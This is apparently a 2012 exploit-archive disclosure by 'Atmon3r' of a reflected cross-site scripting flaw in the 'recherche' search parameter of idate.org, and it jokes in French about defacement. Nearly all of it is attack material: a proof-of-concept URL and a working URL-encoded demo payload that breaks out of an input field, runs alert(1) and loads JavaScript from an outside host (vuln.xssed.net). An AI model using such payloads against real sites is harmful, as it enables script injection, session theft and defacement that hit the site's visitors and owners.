+-------------------------------------------------------------------------+ # Exploit Title : Idate.org - website XSS (Cross Site Scripting) and deface passive # Author : Atmon3r # Date : 16/04/2012 # Xss type : $_GET # Perso : Chez Idate, On se touche la bibitte avec HADOPI ! xD +-------------------------------------------------------------------------+ [+] POC: http://www.idate.org/2009/pages/index.php?recherche={XSS}&x=15&y=10&all=recherche&idl=21 [+] DEMO: http://www.idate.org/2009/pages/index.php?recherche=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%22%3E%3C/script%3E&x=15&y=10&all=recherche&idl=21